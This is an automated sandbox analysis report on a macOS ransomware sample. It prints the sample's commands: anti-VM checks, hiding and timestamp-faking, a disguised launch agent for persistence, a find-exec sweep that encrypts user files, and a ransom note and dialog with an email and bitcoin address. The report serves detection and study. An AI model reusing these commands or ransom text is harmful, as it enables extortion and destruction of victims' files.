
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 38999
Start time: 18:06:13
Joe Sandbox Product: Cloud
Start date: 16.06.2017
Overall analysis duration: 0h 16m 47s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: macRansom
Cookbook file name: default.jbs
Analysis system description: Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_131)
Detection: MAL
Classification: mal80.rans.evad.mac@0/163@0/0
Warnings:
  • Report creation exceeded maximum number of non-whitelisted processes and may have missing process information.


Detection

Strategy: Threshold
Score: 80
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Classification

Analysis Advice

Exit code suggests that the sample could not be started; try looking at standard streams or writes to anonymous pipes for a possible reason.



Signature Overview



Spam, unwanted Advertisements and Ransom Demands:

Executes the "find" command together with an exec argument (may be an indication for ransomware)
Source: /bin/sh (PID: 715) Find command executed: find /Volumes /var/root ! -path /var/root/Library/.FS_Store -type f -size +8c -user root -perm -u=r -exec /var/root/Library/.FS_Store {} +
Creates a notice file (html or txt) to demand a ransom
Source: /var/root/Library/.FS_Store File dropped: /private/var/root/Desktop/._README_ -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Source: /bin/sh File dropped: /private/var/root/Desktop/__README__0 through /private/var/root/Desktop/__README__8 (nine files) -> same notice text as above
Uses Apple script to display a ransom dialog message
Source: /bin/sh (PID: 736) Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'

System Summary:

Classification label
Source: classification engine Classification label: mal80.rans.evad.mac@0/163@0/0

Persistence and Installation Behavior:

Reads data from the local random generator
Source: /var/root/Library/.FS_Store (PID: 704) Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 736) Random device file read: /dev/random
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /usr/bin/osascript (PID: 736) AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to disk
Source: /Users/vreni/Desktop/macRansom (PID: 686) XML plist file created: /private/var/root/Library/LaunchAgents/com.apple.finder.plist
Creates hidden files, links and/or directories
Source: /bin/mv (PID: 697) Hidden file moved: /Users/vreni/Desktop/macRansom -> /var/root/Library/.FS_Store
Source: /var/root/Library/.FS_Store (PID: 704) Hidden file created: /var/root/Desktop/._README_
Creates launch services that start periodically
Source: /Users/vreni/Desktop/macRansom (PID: 686) Launch agent/daemon created with StartInterval and/or StartCalendarInterval, file created: /var/root/Library/LaunchAgents/com.apple.finder.plist
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Source: /bin/sh (PID: 736) Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 777)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 780)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 784)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 787)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 790)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 793)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 796)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 799)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 802)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 805)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 808)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 811)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 814)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 817)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 820)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 823)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 826)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 829)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 832)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 835)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 838)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 841)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 844)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 847)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 850)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 853)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 856)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 859)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 862)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 865)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Executes commands using a shell command-line interpreter
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c sysctl hw.model|grep Mac > /dev/null
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c echo $((`sysctl -n hw.logicalcpu`/`sysctl -n hw.physicalcpu`))|grep 2 > /dev/null
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c mv '/Users/vreni/Desktop/macRansom' '/var/root/Library/.FS_Store'
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c touch -ct 201606071012 '/var/root/Library/.FS_Store'
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c touch -ct 201606071012 '/var/root/Library/LaunchAgents/com.apple.finder.plist'
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c launchctl remove com.apple.finder
Source: /Users/vreni/Desktop/macRansom (PID: 686)Shell command executed: sh -c launchctl load /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /usr/bin/bash (PID: 702)Shell command executed: bash -c ! pgrep -x .FS_Store && ~/Library/.FS_Store
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c sysctl hw.model|grep Mac > /dev/null
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c echo $((`sysctl -n hw.logicalcpu`/`sysctl -n hw.physicalcpu`))|grep 2 > /dev/null
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c find /Volumes ~ ! -path '/var/root/Library/.FS_Store' -type f -size +8c -user `whoami` -perm -u=r -exec '/var/root/Library/.FS_Store' {} +
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c touch -ct 201606071012 '/var/root/Library/LaunchAgents/com.apple.finder.plist'
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c touch -ct 201606071012 '/var/root/Library/.FS_Store'
Source: /var/root/Library/.FS_Store (PID: 704)Shell command executed: sh -c killall Finder
Source: /var/root/Library/.FS_Store (PID: 718)Shell command executed: sh -c sysctl hw.model|grep Mac > /dev/null
